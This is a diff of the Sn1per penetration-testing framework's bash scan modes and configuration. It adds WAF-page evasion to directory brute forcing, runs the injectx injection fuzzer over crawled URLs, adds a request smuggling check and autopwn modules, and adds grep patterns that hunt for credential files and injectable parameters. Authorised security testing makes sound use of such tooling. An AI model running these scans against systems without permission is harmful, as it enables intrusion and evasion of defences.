python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-full.txt
|
||||
|
|
@ -238,7 +244,7 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-exploits.txt
|
||||
|
|
@ -312,7 +318,12 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
rm -f $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
|
||||
if [[ "$SMUGGLER" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python3 /usr/share/sniper/plugins/smuggler/smuggler.py -u http://$TARGET:$PORT | tee $LOOT_DIR/web/smuggler-$TARGET-port${PORT}.txt
|
||||
fi
|
||||
SSL="false"
|
||||
source $INSTALL_DIR/modes/web_autopwn.sh
|
||||
source $INSTALL_DIR/modes/osint_stage_2.sh
|
||||
|
|
@ -325,19 +336,15 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
SSL="false"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
|
||||
|
||||
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
done
|
||||
|
||||
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
|
||||
fi
|
||||
|
||||
source $INSTALL_DIR/modes/sc0pe.sh
|
||||
cd $INSTALL_DIR
|
||||
FULLNMAPSCAN="1"
|
||||
source $INSTALL_DIR/modes/fullportscan.sh
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
|
|||
|
|
@ -181,25 +181,25 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2019-51-index?url=*.$TARGET&output=json" | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2019-51-index?url=*.$TARGET&output=json" | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$WAYBACKMACHINE" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$HACKERTARGET" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING HACKERTARGET URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://api.hackertarget.com/pagelinks/?q=https://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid" | tee $LOOT_DIR/web/hackertarget-https-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://api.hackertarget.com/pagelinks/?q=https://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid" | tee $LOOT_DIR/web/hackertarget-https-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$GUA" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING GUA URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
gau2 -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null
|
||||
gau2 -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$BLACKWIDOW" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -207,7 +207,7 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
|
||||
blackwidow -u https://$TARGET:$PORT -l 3 -s y -v n 2> /dev/null
|
||||
blackwidow -u https://$TARGET:$PORT -l 3 -v n 2> /dev/null
|
||||
cp -f /usr/share/blackwidow/"$TARGET"_"$PORT"/"$TARGET"_"$PORT"-*.txt $LOOT_DIR/web/ 2>/dev/null
|
||||
cat /usr/share/blackwidow/"$TARGET"_*/"$TARGET"_*-urls-sorted.txt > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
|
|
@ -222,6 +222,12 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
|
||||
fi
|
||||
fi
|
||||
if [[ "$INJECTX" == "1" ]]; then
|
||||
rm -f $LOOT_DIR/web/injectx-$TARGET-https.txt 2> /dev/null
|
||||
#cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep 'https\:' | xargs -P $THREADS -r -n 1 -I '{}' injectx.py -u '{}' -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https.txt
|
||||
for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "https\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "https\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https.txt; done; done;
|
||||
fi
|
||||
source $INSTALL_DIR/modes/static-grep-search.sh
|
||||
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
|
||||
source $INSTALL_DIR/modes/javascript-analysis.sh
|
||||
fi
|
||||
|
|
@ -232,7 +238,7 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_COMMON -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-common.txt -fw -r
|
||||
|
|
@ -243,7 +249,7 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-full.txt -fw -r
|
||||
|
|
@ -254,7 +260,7 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-exploits.txt -fw -r
|
||||
|
|
@ -320,8 +326,13 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
rm -f $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
if [[ "$SMUGGLER" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python3 /usr/share/sniper/plugins/smuggler/smuggler.py -u https://$TARGET:$PORT | tee $LOOT_DIR/web/smuggler-$TARGET-port${PORT}.txt
|
||||
fi
|
||||
cd $INSTALL_DIR
|
||||
|
||||
SSL="true"
|
||||
source $INSTALL_DIR/modes/web_autopwn.sh
|
||||
source $INSTALL_DIR/modes/osint_stage_2.sh
|
||||
|
|
|
|||
22
sniper
22
sniper
|
|
@ -17,7 +17,7 @@ SNIPER_PRO=$INSTALL_DIR/pro.sh
|
|||
service postgresql start 2> /dev/null
|
||||
|
||||
# LOAD DEFAULT SNIPER CONFIGURATION FILE
|
||||
source $INSTALL_DIR/sniper.conf
|
||||
source $INSTALL_DIR/sniper.conf
|
||||
echo -e "$OKBLUE[*]$RESET Loaded configuration file from $INSTALL_DIR/sniper.conf $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
|
||||
if [[ -f /root/.sniper.conf ]]; then
|
||||
|
|
@ -30,7 +30,7 @@ if [[ -f /root/.sniper.conf ]]; then
|
|||
source /root/.sniper_api_keys.conf
|
||||
echo -e "$OKBLUE[*]$RESET Loaded API keys from /root/.sniper_api_keys.conf $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
fi
|
||||
|
||||
|
||||
else
|
||||
# IF NO USER CONFIG PRESENT, CREATE IT FROM THE DEFAULT TEMPLATE
|
||||
cp $INSTALL_DIR/sniper.conf /root/.sniper.conf 2> /dev/null
|
||||
|
|
@ -167,7 +167,7 @@ function check_update {
|
|||
LATEST_VER=$(curl --connect-timeout 5 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
|
||||
if [[ "$LATEST_VER" != "$VER" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE] sniper v$LATEST_VER is available to download... To update, type$OKRED \"sniper -u\" $RESET"
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
|
|
@ -239,7 +239,7 @@ case $key in
|
|||
echo -e "$OKBLUE[*]$RESET Creating backup of existing config to /root/.sniper.conf.bak...$OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
cp -f /root/.sniper.conf /root/.sniper.conf.bak
|
||||
echo -e "$OKBLUE[*]$RESET Copying $CONFIG to /root/.sniper.conf...$OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
cp -f $CONFIG /root/.sniper.conf
|
||||
cp -f $CONFIG /root/.sniper.conf
|
||||
source /root/.sniper.conf
|
||||
sleep 1
|
||||
shift
|
||||
|
|
@ -378,7 +378,7 @@ case $key in
|
|||
exit
|
||||
fi
|
||||
echo "Archiving $WORKSPACE to $INSTALL_DIR/loot/$WORKSPACE.tar"
|
||||
cd $INSTALL_DIR/loot/workspace/ && tar -cvf ../$WORKSPACE.tar $WORKSPACE
|
||||
cd $INSTALL_DIR/loot/workspace/ && tar -cvf ../$WORKSPACE.tar $WORKSPACE
|
||||
echo "Done!"
|
||||
exit
|
||||
shift
|
||||
|
|
@ -523,7 +523,7 @@ function loot {
|
|||
|
||||
# DISABLED FOR CONTINUITY / ENABLE FOR SPEED
|
||||
#rm -f sniper-*.txt 2>/dev/null
|
||||
|
||||
|
||||
cd ..
|
||||
chmod 777 -Rf $LOOT_DIR
|
||||
#echo -e "$OKORANGE + -- --=[ Parsing NMap Ports... $RESET"
|
||||
|
|
@ -578,11 +578,11 @@ function loot {
|
|||
if [[ -f $SNIPER_PRO ]]; then
|
||||
wc -l $LOOT_DIR/scans/notifications.txt 2> /dev/null | awk '{print $1}' > $LOOT_DIR/scans/notifications_total.txt 2> /dev/null
|
||||
cat $LOOT_DIR/scans/tasks-running.txt 2> /dev/null > $LOOT_DIR/scans/tasks-running_total.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/scans/tasks.txt 2> /dev/null | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/tasks_total.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/scans/scheduled/*.sh 2> /dev/null | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/scheduled_tasks_total.txt 2> /dev/null
|
||||
grep "Host\ status" $LOOT_DIR/scans/notifications.txt 2> /dev/null | wc -l | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/host_status_changes_total.txt 2> /dev/null
|
||||
grep "Port\ change" $LOOT_DIR/scans/notifications.txt 2> /dev/null | wc -l | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/port_changes_total.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/domains/domains_new-*.txt 2> /dev/null | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/domain_changes_total.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/scans/tasks.txt 2> /dev/null | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/tasks_total.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/scans/scheduled/*.sh 2> /dev/null | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/scheduled_tasks_total.txt 2> /dev/null
|
||||
grep "Host\ status" $LOOT_DIR/scans/notifications.txt 2> /dev/null | wc -l | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/host_status_changes_total.txt 2> /dev/null
|
||||
grep "Port\ change" $LOOT_DIR/scans/notifications.txt 2> /dev/null | wc -l | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/port_changes_total.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/domains/domains_new-*.txt 2> /dev/null | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/domain_changes_total.txt 2> /dev/null
|
||||
cat $LOOT_DIR/web/dirsearch-new-*.txt $LOOT_DIR/web/spider-new-*.txt 2> /dev/null | wc -l | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/url_changes_total.txt 2> /dev/null
|
||||
if [[ -f "$LOOT_DIR/notes/notepad.html" ]]; then
|
||||
echo -n "" 2>/dev/null
|
||||
|
|
|
|||
44
sniper.conf
44
sniper.conf
|
|
@ -11,12 +11,10 @@ RESET='\e[0m'
|
|||
REGEX='^[0-9]+$'
|
||||
|
||||
# DEFAULT SETTINGS
|
||||
VERBOSE="0"
|
||||
AUTOBRUTE="0"
|
||||
FULLNMAPSCAN="0"
|
||||
OSINT="0"
|
||||
ENABLE_AUTO_UPDATES="1"
|
||||
# ONLINE="1"
|
||||
REPORT="1"
|
||||
LOOT="1"
|
||||
|
||||
|
|
@ -38,6 +36,7 @@ OPENVAS_HOST="127.0.0.1"
|
|||
OPENVAS_PORT="9390"
|
||||
OPENVAS_USERNAME="admin"
|
||||
OPENVAS_PASSWORD=""
|
||||
OPENVAS_RUNAS_USER="kali"
|
||||
|
||||
# NESSUS CONFIG
|
||||
NESSUS="0"
|
||||
|
|
@ -65,7 +64,6 @@ HUNTERIO_KEY=""
|
|||
GITHUB_API_KEY=""
|
||||
|
||||
# SLACK API
|
||||
SLACK_API_TOKEN=""
|
||||
SLACK_NOTIFICATIONS="0"
|
||||
SLACK_NOTIFICATIONS_THEHARVESTER="0"
|
||||
SLACK_NOTIFICATIONS_EMAIL_SECURITY="0"
|
||||
|
|
@ -86,6 +84,14 @@ SLACK_NOTIFICATIONS_METAGOOFIL="0"
|
|||
SLACK_NOTIFICATIONS_ARACHNI_SCAN="0"
|
||||
SLACK_NOTIFICATIONS_EMAIL_FORMAT="0"
|
||||
|
||||
# ACTIVE WEB BRUTE FORCE STAGES
|
||||
WEB_BRUTE_STEALTHSCAN="1"
|
||||
WEB_BRUTE_COMMONSCAN="1"
|
||||
WEB_BRUTE_FULLSCAN="0"
|
||||
WEB_BRUTE_EXPLOITSCAN="0"
|
||||
WEB_JAVASCRIPT_ANALYSIS="1"
|
||||
MAX_JAVASCRIPT_FILES="25"
|
||||
|
||||
# WEB BRUTE FORCE WORDLISTS
|
||||
WEB_BRUTE_STEALTH="$INSTALL_DIR/wordlists/web-brute-stealth.txt"
|
||||
WEB_BRUTE_COMMON="$INSTALL_DIR/wordlists/web-brute-common.txt"
|
||||
|
|
@ -94,10 +100,26 @@ WEB_BRUTE_EXPLOITS="$INSTALL_DIR/wordlists/web-brute-exploits.txt"
|
|||
WEB_BRUTE_EXTENSIONS="htm,html,asp,aspx,php,jsp,js"
|
||||
WEB_BRUTE_EXCLUDE_CODES="400,403,404,405,406,429,500,502,503,504"
|
||||
|
||||
# GREP PATTERNS
|
||||
STATIC_GREP_SEARCH="1"
|
||||
GREP_MAX_LINES="10"
|
||||
GREP_INTERESTING_SUBDOMAINS="admin|jenkins|test|proxy|stage|test|dev|devops|staff|db|qa|internal"
|
||||
GREP_EXTENSIONS="\.action|\.adr|\.ascx|\.asmx|\.axd|\.backup|\.bak|\.bkf|\.bkp|\.bok|\.achee|\.cfg|\.cfm|\.cgi|\.cnf|\.conf|\.config|\.crt|\.csr|\.csv|\.dat|\.doc|\.docx|\.eml|\.env|\.exe|\.gz|\.ica|\.inf|\.ini|\.java|\.json|\.key|\.log|\.lst|\.mai|\.mbox|\.mbx|\.md|\.mdb|\.nsf|\.old|\.ora|\.pac|\.passwd|\.pcf|\.pdf|\.pem|\.pgp|\.pl| plist|\.pwd|\.rdp|\.reg|\.rtf|\.skr|\.sql|\.swf|\.tpl|\.txt|\.url|\.wml|\.xls|\.xlsx|\.xml|\.xsd|\.yml"
|
||||
GREP_PARAMETERS="template=|preview=|id=|view=|activity=|name=|content=|redirect=|(&|[?])access(&|=)|(&|[?])admin(&|=)|(&|[?])dbg(&|=)|(&|[?])debug(&|=)|(&|[?])edit(&|=)|(&|[?])grant(&|=)|(&|[?])test(&|=)|(&|[?])alter(&|=)|(&|[?])clone(&|=)|(&|[?])create(&|=)|(&|[?])delete(&|=)|(&|[?])disable(&|=)|(&|[?])enable(&|=)|(&|[?])exec(&|=)|(&|[?])execute(&|=)|(&|[?])load(&|=)|(&|[?])make(&|=)|(&|[?])modify(&|=)|(&|[?])rename(&|=)|(&|[?])reset(&|=)|(&|[?])shell(&|=)|(&|[?])toggle(&|=)|(&|[?])adm(&|=)|(&|[?])root(&|=)|(&|[?])cfg(&|=)|(&|[?])dest(&|=)|(&|[?])redirect(&|=)|(&|[?])uri(&|=)|(&|[?])path(&|=)|(&|[?])continue(&|=)|(&|[?])url(&|=)|(&|[?])window(&|=)|(&|[?])next(&|=)|(&|[?])data(&|=)|(&|[?])reference(&|=)|(&|[?])site(&|=)|(&|[?])html(&|=)|(&|[?])val(&|=)|(&|[?])validate(&|=)|(&|[?])domain(&|=)|(&|[?])callback(&|=)|(&|[?])return(&|=)|(&|[?])feed(&|=)|(&|[?])host(&|=)|(&|[?])port(&|=)|(&|[?])to(&|=)|(&|[?])out(&|=)|(&|[?])view(&|=)|(&|[?])dir(&|=)|(&|[?])show(&|=)|(&|[?])navigation(&|=)|(&|[?])open(&|=)|(&|[?])file(&|=)|(&|[?])document(&|=)|(&|[?])folder(&|=)|(&|[?])pg(&|=)|(&|[?])php_path(&|=)|(&|[?])style(&|=)|(&|[?])doc(&|=)|(&|[?])img(&|=)|(&|[?])filename(&|=)|id=|select=|report=|role=|update=|query=|user=|name=|sort=|where=|search=|params=|process=|row=|view=|table=|from=|sel=|results=|sleep=|fetch=|order=|keyword=|column=|field=|delete=|string=|number=|filter=|(&|[?])callback=|(&|[?])cgi-bin/redirect.cgi|(&|[?])checkout=|(&|[?])checkout_url=|(&|[?])continue=|(&|[?])data=|(&|[?])dest=|(&|[?])destination=|(&|[?])dir=|(&|[?])domain=|(&|[?])feed=|(&|[?])file=|(&|[?])file_name=|(&|[?])file_url=|(&|[?])folder=|(&|[?])folder_url=|(&|[?])forward=|(&|[?])from_url=|(&|[?])go=|(&|[?])goto=|(&|[?])host=|(&|[?])html=|(&|[?])image_url=|(&|[?])img_url=|(&|[?])load_file=|(&|[?])load_url=|(&|[?])login_url=|(&|[?])logout=|(&|[?])navigation=|(&|[?])next=|(&|[?])next_page=|(&|[?])Open=|(&|[?])out=|(&|[?])page_url=|(&|[?])path=|(&|[?])port=|(&|[?])redir=|(&|[?])redirect=|(&|[?])redirect_to=|(&|[?])redirect_uri=|(&|[?])redirect_url=|(&|[?])reference=|(&|[?])return=|(&|[?])return_path=|(&|[?])return_to=|(&|[?])returnTo=|(&|[?])return_url=|(&|[?])rt=|(&|[?])rurl=|(&|[?])show=|(&|[?])site=|(&|[?])target=|(&|[?])to=|(&|[?])uri=|(&|[?])url=|(&|[?])val=|(&|[?])validate=|(&|[?])view=|(&|[?])window=|daemon=|upload=|dir=|execute=|download=|log=|ip=|cli=|cmd=|file=|document=|folder=|root=|path=|pg=|style=|pdf=|template=|php_path=|doc=|page=|name=|id=|user=|account=|number=|order=|no=|doc=|key=|email=|group=|profile=|edit=|report=|access=|admin=|dbg=|debug=|edit=|grant=|test=|alter=|clone=|create=|delete=|disable=|enable=|exec=|execute=|load=|make=|modify=|rename=|reset=|shell=|toggle=|adm=|root=|cfg=|config="
|
||||
GREP_XSS="q=|s=|search=|lang=|keyword=|query=|page=|keywords=|year=|view=|email=|type=|name=|p=|callback=|jsonp=|api_key=|api=|password=|email=|emailto=|token=|username=|csrf_token=|unsubscribe_token=|id=|item=|page_id=|month=|immagine=|list_type=|url=|terms=|categoryid=|key=|l=|begindate=|enddate="
|
||||
GREP_SSRF="access|admin|dbg|debug|edit|grant|test|alter|clone|create|delete|disable|enable|exec|execute|load|make|modify|rename|reset|shell|toggle|adm|root|cfg|dest|redirect|uri|path|continue|url|window|next|data|reference|site|html|val|validate|domain|callback|return|page|feed|host|port|to|out|view|dir|show|navigation|open"
|
||||
